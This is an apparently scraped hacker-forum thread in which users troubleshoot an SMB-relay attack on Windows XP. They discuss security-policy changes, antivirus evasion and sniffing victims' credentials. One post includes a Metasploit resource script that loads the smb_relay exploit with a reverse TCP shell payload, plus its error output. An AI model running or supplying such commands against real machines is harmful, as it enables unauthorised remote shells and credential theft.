Own Full patched XP box via HTTP

[domi007]

Great job, but I got the well-known error message, which starts so:
"FAILED! The remote host has only provided us with Guest privileges...."
Simple file checking: unticked
#14: secpol.msc: edited
The user, which is logged in has admistrator rights, etc...
I made also another account, also with admin rights, but still get the error message.

What else?

DOMy

[domi007]

I also tried to run Internet Explorer as an Administrator, and also with the "at" command (as the user SYSTEM)...

None of them changed anything.

[opreat0r]

post the output of msfconsole ???

Code:

5. On a Windows XP Pro computer, make sure that remote logons are not being coerced to the GUEST account (aka "ForceGuest", which is enabled by default computers that are not attached to a domain). To do this, open the Local Security Policy editor (e.g. by typing 'secpol.msc' into the Run box, without quotes). Expand the "Local Policies" node and select "Security Options". Now scroll down to the setting titled "Network access: Sharing and security model for local accounts". If this is set to "Guest only", change it to "Classic" and restart your computer.

that is the only thing I can think that would cause that ..

also look at my new toy
http://forums.remote-exploit.org/showthread.php?p=94904

[opreat0r]

NM the GUEST error just means the it failed .. look for the error before the guest error ..

post the output of msfconsole ???

Code:

5. On a Windows XP Pro computer, make sure that remote logons are not being coerced to the GUEST account (aka "ForceGuest", which is enabled by default computers that are not attached to a domain). To do this, open the Local Security Policy editor (e.g. by typing 'secpol.msc' into the Run box, without quotes). Expand the "Local Policies" node and select "Security Options". Now scroll down to the setting titled "Network access: Sharing and security model for local accounts". If this is set to "Guest only", change it to "Classic" and restart your computer.

that is the only thing I can think that would cause that ..

also look at my new toy
http://forums.remote-exploit.org/showthread.php?p=94904

[icebreaker101010]

It will not work if the victim ,have a good antivirus.Like KIS 2009.

[terminal86]

It will not work if the victim ,have a good antivirus.Like KIS 2009.

Join Date: Jun 2007
Posts: 1


And that is your first post?!

[icebreaker101010]

What if we can hack without that condition :without obtaining victim credentials with ettercap filter.Maybe we can sniff victim credentials and use them with another type of exploit.And how can you hack somenone if he don't have simple file sharing unselected?

[bharathraj77]

Thank You people.... I will try the same and let you know the result

[mRM3e]

Im going to take a shot at this with service pack 2 and 3. Ill let you all know the outcome.

mr_me

[mRM3e]

I cannot seem to get this exploit working. I have edited the secpol.msc I have inputed the correct IPs into the filter and .rc file. For some reason I cant seem to bind to the service. I have tried alternate port numbers

Code:

resource> use exploit/windows/smb/smb_relay
resource> set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
resource> set LHOST 192.168.0.5
LHOST => 192.168.0.5
resource> set LPORT 21
LPORT => 21
resource> exploit[*] Exploit running as background job.
msf exploit(smb_relay) >[*] Handler binding to LHOST 192.168.0.5
[-] Bind failed on 192.168.0.5[*] Handler binding to LHOST 0.0.0.0
[-] Bind failed on 0.0.0.0
[-] Exploit failed: The address is already in use (0.0.0.0:21).

I am running xp sp2 on a virtual machine with bridge networking. If anyone could help that would be great however I will have another go tomorrow.

mr_me